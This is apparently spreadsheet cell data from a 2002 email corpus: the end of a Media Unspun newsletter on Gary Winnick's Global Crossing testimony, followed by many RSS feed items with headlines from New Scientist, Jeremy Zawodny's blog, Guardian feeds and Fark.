[URL]http://www.nypost.com[/URL]  SUSAN TOMPOR: Bad news is, the beating isn't over yet  [URL]http://www.freep.com[/URL]  Sponsor What's Really Going on at Microsoft? Mary Jo Foley delivers unmatched reporting and insight with MICROSOFT WATCH.  Track initiatives like .Net, Palladium, Longhorn, Trinity, Yukon; release dates, competitive moves, people. For a FREE 14-day trial subscription: [URL]https://ziffdavis.omeda.com[/URL]  			 			 			 			 			 			Winnick: Hands-Off or Red-Handed? 			 			 			 Former Global Crossing chairman Gary Winnick will appear before a Congressional committee today. It won't be pretty. CNN predicted he will plead the Fifth. Most other outlets expected Winnick to testify. Impetus for all the coverage was yesterday's release by the House Energy and Commerce Committee of memos indicating that Winnick was in the thick of the company's suspect dealmaking. A committee spokesman said, "If he tries to portray himself as an out-of-the-loop ceremonial chairman, we intend to remind him that he is under oath." The memo that got most of the attention was one from then-CEO Leo Hindery to Winnick in June 2001. Hindery warned in colorful language that the company was heading for a fall. The Financial Times, Washington Post, and New York Times all ran a quote from the memo comparing telcos to salmon. Hindery urged Winnick to unload the company -- "without looking like we are shaking our bootie all over the world," quoted the two Timeses -- and resigned shortly thereafter. One little detail from the memos is guaranteed to make Winnick's time under the television lights even more uncomfortable. Among the companies he used his influence with, to help close deals, was Enron. All the reports mentioned Enron, but the New York Times seemed to be alone in noting that Global Crossing never completed a deal with the fallen energy giant. The Wall Street Journal looked beyond the obviously embarrassing details of the memos to point out that, despite such evidence, the gun might not be smoking yet. "Prosecutors would still need to prove that he knew the transactions were improper and used them mainly as a way of enriching himself by boosting the company's stock price artificially," the Journal reporters wrote. The AP noted that all of the memos were dated after Winnick's last sale of Global Crossing stock, $123 million in May 2001. Despite his $734 million in stock profits, Gary Winnick was not among the five telco executives being sued by New York attorney general Eliot Spitzer to return their ill-gotten gains. Is Spitzer betting, with the Journal, that Winnick might walk away clean? - Keith Dawson Global Crossing: What Did Winnick Know? [URL]http://www.cnn.com[/URL]  Winnick Was Told Of Telecom Risks [URL]http://www.washingtonpost.com[/URL]  Memo Indicates Global Crossing Chief Knew of Troubles [URL]http://www.nytimes.com[/URL]  Global Crossing's Winnick Knew About Swap Deals [URL]http://online.wsj.com[/URL],,SB1033426396710785953,00.html  (Paid subscription required) Documents show active role by Global Crossing chairman (AP) [URL]http://www.bayarea.com[/URL]  Suit Seeks IPO Profits From Five Executives [URL]http://www.washingtonpost.com[/URL]  			 			 			 			 			 			Other Stories 			 			 			 Fund giant Fidelity set to eliminate 1,695 jobs (Boston Globe) [URL]http://tinyurl.com[/URL]  AOL Chairman's No. 1 Ally Turns Into His Biggest Foe [URL]http://www.nytimes.com[/URL]  More living without benefits: Health insurance given less frequently at work   [URL]http://www.freep.com[/URL]  Beware al-Qaida, Branch is on to you (Battle Creek Enquirer) [URL]http://tinyurl.com[/URL]  Hewlett-Packard and EMC Sue Each Other (Reuters) [URL]http://www.nytimes.com[/URL]  Dealing With W [URL]http://www.nytimes.com[/URL]  Broadband Disconnect [URL]http://www.washingtonpost.com[/URL]  Judge Dismisses $800M Cell Phone-Brain Tumor Suit (AP) [URL]http://www.washingtonpost.com[/URL]  Microsoft Puts Meat Behind Security Push [URL]http://www.eweek.com[/URL],3959,561985,00.asp  Sponsor 			 				 					 					Do you want to reach the Net's savviest audience? Advertise in Media Unspun. Contact Erik Vanderkolk for details at erikvanderkolk@yahoo.com today. 					 					 			 			 			 			 			 			Staff 			 			 			 			 				 					 					Written by Deborah Asbrand (dasbrand@world.std.com), Keith Dawson (dawson@world.std.com), Jen Muehlbauer (jen@englishmajor.com), and Lori Patel (loripatel@hotmail.com). Copyedited by Jim Duffy (jimduffy86@yahoo.com). Marketing: Cowpoke Productions (cowpokeproductions.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Subscribe 		 	 Enter your email address in the box below to receive a free four-week trial of Media Unspun:  			 			Add 			 		 	 		 		 		Remove 		SendasHTML Â  	 	   Newsletter Services Provided by iMakeNews.com Advertisement Tell a Friend... Powered by iMakeNews.comâ„¢ This email was sent to: zzz-unspun@example.com Click here to be instantly removed from this list.Click here to receive future messages in plain text format.Click here to change your subscriber information and preferences. Â  		    	            ------------=_1033478774-12610-4--</t>
  </si>
  <si>
    <t>http://newsletter.mediaunspun.com www.mediaunspun.com http://www.mediaunspun.com http://www.thestreet.com http://www.usatoday.com http://www.nydailynews.com http://www.msnbc.com http://www.nytimes.com http://www.washingtonpost.com http://tinyurl.com http://www.siliconvalley.com http://online.wsj.com http://www.nypost.com http://www.freep.com https://ziffdavis.omeda.com http://www.cnn.com http://www.washingtonpost.com http://www.nytimes.com http://online.wsj.com http://www.bayarea.com http://www.washingtonpost.com http://tinyurl.com http://www.nytimes.com http://www.freep.com http://tinyurl.com http://www.nytimes.com http://www.nytimes.com http://www.washingtonpost.com http://www.washingtonpost.com http://www.eweek.com http://www.mediaunspun.com http://newsletter.mediaunspun.com http://www.imakenews.com http://www.imakenews.com http://www.imakenews.com http://www.imakenews.com www.mediaunspun.com http://www.mediaunspun.com http://www.poptech.org http://www.thestreet.com http://www.usatoday.com http://www.nydailynews.com http://www.msnbc.com http://www.nytimes.com http://www.washingtonpost.com http://tinyurl.com http://www.siliconvalley.com http://online.wsj.com http://www.nypost.com http://www.freep.com https://ziffdavis.omeda.com http://www.cnn.com http://www.washingtonpost.com http://www.nytimes.com http://online.wsj.com http://www.bayarea.com http://www.washingtonpost.com http://tinyurl.com http://www.nytimes.com http://www.freep.com http://tinyurl.com http://www.nytimes.com http://www.nytimes.com http://www.washingtonpost.com http://www.washingtonpost.com http://www.eweek.com http://www.mediaunspun.com http://newsletter.mediaunspun.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: newscientist &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 01 Oct 2002 08:02:06 -0000</t>
  </si>
  <si>
    <t>Tue, 01 Oct 2002 08:02:06 -0000</t>
  </si>
  <si>
    <t>Giant Congo hydroelectric project is a 'betrayal'</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8391026,1440/\nDate: Not supplied\n\nCampaigners say this and other mega-projects renege on promises made by African \nleaders at the World Summit in Johannesburg</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: newscientist &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 01 Oct 2002 08:02:05 -0000</t>
  </si>
  <si>
    <t>Tue, 01 Oct 2002 08:02:05 -0000</t>
  </si>
  <si>
    <t>Drug halves genital herpes transmission</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8397801,1440/\nDate: Not supplied\n\nThe antiviral drug significantly reduces the spread of the incurable infection \nthrough sex</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: newscientist &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 01 Oct 2002 08:02:02 -0000</t>
  </si>
  <si>
    <t>Tue, 01 Oct 2002 08:02:02 -0000</t>
  </si>
  <si>
    <t>Space shuttle ready for return</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8399728,1440/\nDate: Not supplied\n\nAfter months of repairs to cracked fuel lines, the shuttle prepares for \nlift-off - an onboard video camera will relay live footage</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: newscientist &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 01 Oct 2002 08:02:00 -0000</t>
  </si>
  <si>
    <t>Tue, 01 Oct 2002 08:02:00 -0000</t>
  </si>
  <si>
    <t>Synthetic vitamin boosts bone growth</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8412855,1440/\nDate: Not supplied\n\nThe modified form of vitamin D could be an effective new treatment for \nosteoporosis, says a US team</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: newscientist &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 01 Oct 2002 08:01:58 -0000</t>
  </si>
  <si>
    <t>Tue, 01 Oct 2002 08:01:58 -0000</t>
  </si>
  <si>
    <t>Contact lenses 'boost sexual success'</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8415795,1440/\nDate: Not supplied\n\nNight-clubbers who swapped their glasses for contact lenses report big \nincreases in physical contact with the opposite sex</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: zawodny &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 01 Oct 2002 08:01:56 -0000</t>
  </si>
  <si>
    <t>Tue, 01 Oct 2002 08:01:56 -0000</t>
  </si>
  <si>
    <t>The Boston Globe on Linux and OS X</t>
  </si>
  <si>
    <t>URL: [URL]http://jeremy.zawodny.com[/URL]\nDate: 2002-09-30T20:42:06-08:00\n\nAn article titled Mac poses as much of challenge to Linux as to Windows is both \ninsightful and missing the point. The general thrust of the article, is \ndead-on. It's just the sort of stuff I've been saying to folks...</t>
  </si>
  <si>
    <t>FreeBSD or Linux for your MySQL Server?</t>
  </si>
  <si>
    <t>URL: [URL]http://jeremy.zawodny.com[/URL]\nDate: 2002-09-30T17:22:34-08:00\n\nThis is an issue that comes up all the time at work. It is an issue for roughly \nfour reasons: Yahoo is a FreeBSD shop Someone has heard that MySQL runs better \non Linux Someone knows that we run some...</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: zawodny &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 01 Oct 2002 08:01:55 -0000</t>
  </si>
  <si>
    <t>Tue, 01 Oct 2002 08:01:55 -0000</t>
  </si>
  <si>
    <t>catalogs.google.com - in time for xmas?</t>
  </si>
  <si>
    <t>URL: [URL]http://jeremy.zawodny.com[/URL]\nDate: 2002-09-30T23:14:34-08:00\n\nWatch out Yahoo Shopping and other shopping meta-sites. Google is at it again \nwith Google Catalogs. The only question in mind mind is this: Will it hit big \nthis Christmas shopping season or next year? Google Product Search and \nRatings....</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: gamasutra &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 01 Oct 2002 08:01:39 -0000</t>
  </si>
  <si>
    <t>Tue, 01 Oct 2002 08:01:39 -0000</t>
  </si>
  <si>
    <t>gamasutra &lt;rssfeeds@spamassassin.taint.org&gt;</t>
  </si>
  <si>
    <t>The plight of Qadir Fedayee</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8404899,215/\nDate: 2002-09-30T19:25:01+01:00\n\n*Sydney dispatch:* An Afghan boy whose family was killed during massacres in \nMazar-i-Sharif has been denied asylum in Australia, says *David Fickling*.</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: gamasutra &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 01 Oct 2002 08:01:36 -0000</t>
  </si>
  <si>
    <t>Tue, 01 Oct 2002 08:01:36 -0000</t>
  </si>
  <si>
    <t>Equitable prepares to compensate 70,000</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8418833,215/\nDate: 2002-10-01T04:33:51+01:00\n\n*Money:* Up to 70,000 former Equitable Life policyholders could be in line for \ncompensation as a result of mis-selling of policies.</t>
  </si>
  <si>
    <t>PFI hospital's 97m pay bill could cost NHS billions</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8418832,215/\nDate: 2002-10-01T04:33:52+01:00\n\n*Society:* Nurses and ancillary staff at a PFI hospital are set to win a legal \nbattle over equal pay that will cost the hospital 97m in back pay and add 13m \nto its annual wage bill.</t>
  </si>
  <si>
    <t>Pensioners and housebuyers suffer</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8418831,215/\nDate: 2002-10-01T04:33:53+01:00\n\n*Business:* Standard Life finally capitulates and cuts payouts on millions of \npolicies.</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: gamasutra &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 01 Oct 2002 08:01:35 -0000</t>
  </si>
  <si>
    <t>Tue, 01 Oct 2002 08:01:35 -0000</t>
  </si>
  <si>
    <t>Cobain dispute settled</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8418829,215/\nDate: 2002-10-01T04:33:55+01:00\n\n*Arts:* The long-running dispute between the widow of Kurt Cobain and the \nremaining two members of his band Nirvana has been settled, paving the way for \na new CD.</t>
  </si>
  <si>
    <t>Liddle quits Today with new BBC deal</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8418828,215/\nDate: 2002-10-01T04:33:56+01:00\n\n*Media:* The race is on for the most coveted job in BBC News after Rod Liddle \nsays he is stepping down as editor of the Today programme.</t>
  </si>
  <si>
    <t>No Blackpool illumination from these control freaks</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8418830,215/\nDate: 2002-10-01T04:33:54+01:00\n\n*Comment:* The suppression of debate shows Labour's leadership at its worst, \nwrites *Jonathan Freedland*.</t>
  </si>
  <si>
    <t>Tibetans see hint of detente with China</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8418827,215/\nDate: 2002-10-01T04:33:57+01:00\n\n*World latest:* Dalai Lama's envoy hails first contact in 20 years.</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: gamasutra &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 01 Oct 2002 08:01:34 -0000</t>
  </si>
  <si>
    <t>Tue, 01 Oct 2002 08:01:34 -0000</t>
  </si>
  <si>
    <t>Portillo dig at Blunkett in fringe double act</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8418826,215/\nDate: 2002-10-01T04:33:58+01:00\n\n*Politics:* Michael Portillo strode into the hostile territory of the Labour \nparty conference in Blackpool last night to mock David Blunkett as an \nauthoritarian rightwinger.</t>
  </si>
  <si>
    <t>Rail crash bereaved sue over line safety</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8418825,215/\nDate: 2002-10-01T04:33:59+01:00\n\n*UK latest:* Potters Bar claimants' group investigates reason for accident as \nit dismisses Railtrack's compensation offer.</t>
  </si>
  <si>
    <t>How I made Edwina tell all</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8418824,215/\nDate: 2002-10-01T04:34:00+01:00\n\n*Julian Glover*, who worked on John Major's autobiography for two years, on why \nEdwina Currie wasn't in it.</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: gamasutra &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 01 Oct 2002 08:01:33 -0000</t>
  </si>
  <si>
    <t>Tue, 01 Oct 2002 08:01:33 -0000</t>
  </si>
  <si>
    <t>Saddam set to let inspectors in</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8417796,215/\nDate: 2002-10-01T03:33:02+01:00\n\nIraq muddles US resolve with 'positive' talks in Vienna.</t>
  </si>
  <si>
    <t>Brown budget plans in disarray</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8418823,215/\nDate: 2002-10-01T04:34:02+01:00\n\nTreasury admits that growth targets set in March have been destroyed by the \nworsening global economy.</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: fark &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 01 Oct 2002 08:01:29 -0000</t>
  </si>
  <si>
    <t>Tue, 01 Oct 2002 08:01:29 -0000</t>
  </si>
  <si>
    <t>fark &lt;rssfeeds@spamassassin.taint.org&gt;</t>
  </si>
  <si>
    <t>Photoshop a kid getting his tounge measured</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8388720,1717/\nDate: 2002-09-30T10:08:10+01:00\n\n(Some Game Boy)</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: fark &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 01 Oct 2002 08:01:28 -0000</t>
  </si>
  <si>
    <t>Tue, 01 Oct 2002 08:01:28 -0000</t>
  </si>
  <si>
    <t>Farker Chakalasp dares you to Photoshop him</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8388719,1717/\nDate: 2002-09-30T10:08:11+01:00\n\n(Some Farker's roommate)</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: fark &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 01 Oct 2002 08:01:24 -0000</t>
  </si>
  <si>
    <t>Tue, 01 Oct 2002 08:01:24 -0000</t>
  </si>
  <si>
    <t>Bush orders Sharon to obey UN resolutions so US can gather</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8390119,1717/\nDate: 2002-09-30T11:09:23+01:00\n\n[IMG: [URL]http://www.newsisfree.com[/URL] ([smh.com.au])]</t>
  </si>
  <si>
    <t>http://www.newsisfree.com http://www.newsisfree.com</t>
  </si>
  <si>
    <t>Photoshop Theme.. ways to smuggle weapons-grade Uranium .</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8390120,1717/\nDate: 2002-09-30T11:09:22+01:00\n\n(Doc Brown)</t>
  </si>
  <si>
    <t>Madonna is actually quite shy</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8390122,1717/\nDate: 2002-09-30T11:09:20+01:00\n\n[IMG: [URL]http://www.newsisfree.com[/URL] ([The Sun])]</t>
  </si>
  <si>
    <t>Randy Moss smokes ganja</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8390121,1717/\nDate: 2002-09-30T11:09:21+01:00\n\n[IMG: [URL]http://www.newsisfree.com[/URL] ([Yahoo])]</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: fark &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 01 Oct 2002 08:01:23 -0000</t>
  </si>
  <si>
    <t>Tue, 01 Oct 2002 08:01:23 -0000</t>
  </si>
  <si>
    <t>British National Health Service to provide vibrators to women</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8394718,1717/\nDate: 2002-09-30T14:13:10+01:00\n\n(Some Dysfunctional Woman)</t>
  </si>
  <si>
    <t>West Coast port closures may cancel Christmas.</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8398677,1717/\nDate: 2002-09-30T16:15:14+01:00\n\n[IMG: [URL]http://www.newsisfree.com[/URL] ([SacBee])]</t>
  </si>
  <si>
    <t>New Strongbad E-Mail</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8396718,1717/\nDate: 2002-09-30T15:14:16+01:00\n\n[IMG: [URL]http://www.newsisfree.com[/URL] ([Homestar Runner])]</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: fark &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 01 Oct 2002 08:01:22 -0000</t>
  </si>
  <si>
    <t>Tue, 01 Oct 2002 08:01:22 -0000</t>
  </si>
  <si>
    <t>Toddler falls from a first-storey window, saved from injury by</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8398676,1717/\nDate: 2002-09-30T16:15:15+01:00\n\n[IMG: [URL]http://www.newsisfree.com[/URL] ([IOL])]</t>
  </si>
  <si>
    <t>Woman finds rubber glove in hamburger bun. Will now sue</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8404725,1717/\nDate: 2002-09-30T19:18:23+01:00\n\n(Some Guy)</t>
  </si>
  <si>
    <t>Truck driver leaves trail of smelly pizza waste along major</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8402896,1717/\nDate: 2002-09-30T18:17:08+01:00\n\n(charlotte.com)</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: fark &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 01 Oct 2002 08:01:20 -0000</t>
  </si>
  <si>
    <t>Tue, 01 Oct 2002 08:01:20 -0000</t>
  </si>
  <si>
    <t>False teeth to fake limbs, crazy things left behind in hotels</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8404724,1717/\nDate: 2002-09-30T19:18:24+01:00\n\n(canada.com)</t>
  </si>
  <si>
    <t>Family refuses to cancel expensive wedding just because the groom</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8406748,1717/\nDate: 2002-09-30T20:19:09+01:00\n\n(Some Guy)</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: fark &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 01 Oct 2002 08:01:16 -0000</t>
  </si>
  <si>
    <t>Tue, 01 Oct 2002 08:01:16 -0000</t>
  </si>
  <si>
    <t>Professional dog poop scooper has 300 customers</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8406747,1717/\nDate: 2002-09-30T20:19:10+01:00\n\n(charlotte.com)</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: fark &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 01 Oct 2002 08:01:14 -0000</t>
  </si>
  <si>
    <t>Tue, 01 Oct 2002 08:01:14 -0000</t>
  </si>
  <si>
    <t>Scientists prove that shoe size and penis size are not linked.</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8406746,1717/\nDate: 2002-09-30T20:19:11+01:00\n\n[IMG: [URL]http://www.newsisfree.com[/URL] ([Reuters])]</t>
  </si>
  <si>
    <t>Detective sends out Al Qaeda warning based on Onion story</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8408636,1717/\nDate: 2002-09-30T21:20:25+01:00\n\n(Poynter.org)</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: fark &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 01 Oct 2002 08:01:13 -0000</t>
  </si>
  <si>
    <t>Tue, 01 Oct 2002 08:01:13 -0000</t>
  </si>
  <si>
    <t>If you're going to turn on an electric pump to remove water from</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8410273,1717/\nDate: 2002-09-30T22:21:08+01:00\n\n(dayton daily news)</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: fark &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 01 Oct 2002 08:01:12 -0000</t>
  </si>
  <si>
    <t>Tue, 01 Oct 2002 08:01:12 -0000</t>
  </si>
  <si>
    <t>Forged documents, public drinking, massive fistfights... Who knew</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8410272,1717/\nDate: 2002-09-30T22:21:09+01:00\n\n(Philly.com)</t>
  </si>
  <si>
    <t>Man's leg is found 7 miles from a hit and run accident</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8410270,1717/\nDate: 2002-09-30T22:21:11+01:00\n\n(DPO)</t>
  </si>
  <si>
    <t>Motel holds mans wheelchair ransom.</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8410271,1717/\nDate: 2002-09-30T22:21:10+01:00\n\n[IMG: [URL]http://www.newsisfree.com[/URL] ([NandoTimes])]</t>
  </si>
  <si>
    <t>Tip of the Day: When trying to kill head lice with rubbing</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8412060,1717/\nDate: 2002-09-30T23:25:20+01:00\n\n(Some guy with lice)</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: fark &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 01 Oct 2002 08:01:11 -0000</t>
  </si>
  <si>
    <t>Tue, 01 Oct 2002 08:01:11 -0000</t>
  </si>
  <si>
    <t>Bank robber gets the loot, makes it out of bank, shoots self in</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8412057,1717/\nDate: 2002-09-30T23:25:23+01:00\n\n(TBO)</t>
  </si>
  <si>
    <t>The worst Freddy Krueger costume ever</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8412059,1717/\nDate: 2002-09-30T23:25:21+01:00\n\n[IMG: [URL]http://www.newsisfree.com[/URL] ([X-Entertainment])]</t>
  </si>
  <si>
    <t>Cat shot through eye with horse dart tranquilizer roams</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8412058,1717/\nDate: 2002-09-30T23:25:22+01:00\n\n[IMG: [URL]http://www.newsisfree.com[/URL] ([Local6])]</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: fark &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 01 Oct 2002 08:01:10 -0000</t>
  </si>
  <si>
    <t>Tue, 01 Oct 2002 08:01:10 -0000</t>
  </si>
  <si>
    <t>Man rappels off of city bridge trying to hitch a free ride on a</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8415146,1717/\nDate: 2002-10-01T01:27:10+01:00\n\n(canada.com)</t>
  </si>
  <si>
    <t>100 not safe for work pics for chicks. WEENERS.</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8413685,1717/\nDate: 2002-10-01T00:26:14+01:00\n\n(Some depraved farkette)</t>
  </si>
  <si>
    <t>The new trailer for the Lord of the Rings comes out today on AOL</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8417754,1717/\nDate: 2002-10-01T03:29:20+01:00\n\n[IMG: [URL]http://www.newsisfree.com[/URL] ([AintItCoolNews])]</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: fark &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 01 Oct 2002 08:01:09 -0000</t>
  </si>
  <si>
    <t>Tue, 01 Oct 2002 08:01:09 -0000</t>
  </si>
  <si>
    <t>"Cram school" operator arrested for trying to cram it into a 13</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8417753,1717/\nDate: 2002-10-01T03:29:21+01:00\n\n[IMG: [URL]http://www.newsisfree.com[/URL] ([MDN])]</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: fark &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 01 Oct 2002 08:01:06 -0000</t>
  </si>
  <si>
    <t>Tue, 01 Oct 2002 08:01:06 -0000</t>
  </si>
  <si>
    <t>Family's "pet" raccoon attacks baby in crib</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8417752,1717/\nDate: 2002-10-01T03:29:22+01:00\n\n(ClickOnDetroit)</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: fark &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 01 Oct 2002 08:01:05 -0000</t>
  </si>
  <si>
    <t>Tue, 01 Oct 2002 08:01:05 -0000</t>
  </si>
  <si>
    <t>Think before you leap, man flies powered parachute into</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8418808,1717/\nDate: 2002-10-01T04:30:17+01:00\n\n(The Cincinnati Enquirer)</t>
  </si>
  <si>
    <t>Kid crams acorn up his nose, hilarity ensues</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8419990,1717/\nDate: 2002-10-01T05:31:18+01:00\n\n[IMG: [URL]http://www.newsisfree.com[/URL] ([The Sun])]</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: fark &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 01 Oct 2002 08:01:04 -0000</t>
  </si>
  <si>
    <t>Tue, 01 Oct 2002 08:01:04 -0000</t>
  </si>
  <si>
    <t>TV sports babe in trouble for locker room antics</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8421063,1717/\nDate: 2002-10-01T06:32:13+01:00\n\n(Some TV Guy)</t>
  </si>
  <si>
    <t>Man tries to bungee from bridge to passing cruise ship, bashes</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8421992,1717/\nDate: 2002-10-01T07:33:14+01:00\n\n(abc.net.au)</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: fark &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 01 Oct 2002 08:01:03 -0000</t>
  </si>
  <si>
    <t>Tue, 01 Oct 2002 08:01:03 -0000</t>
  </si>
  <si>
    <t>Freak breaks world record by clipping 153 clothespins on his face</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8421991,1717/\nDate: 2002-10-01T07:33:15+01:00\n\n(orange-today.co)</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: fark &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 01 Oct 2002 08:01:02 -0000</t>
  </si>
  <si>
    <t>Tue, 01 Oct 2002 08:01:02 -0000</t>
  </si>
  <si>
    <t>The Ozone Hole is getting smaller... But Leroy's Getting LARRRRRGER</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8423195,1717/\nDate: 2002-10-01T08:34:10+01:00\n\n[IMG: [URL]http://www.newsisfree.com[/URL] ([Yahoo])]</t>
  </si>
  <si>
    <t>Is rap music art? Rap song about farting answers that question</t>
  </si>
  <si>
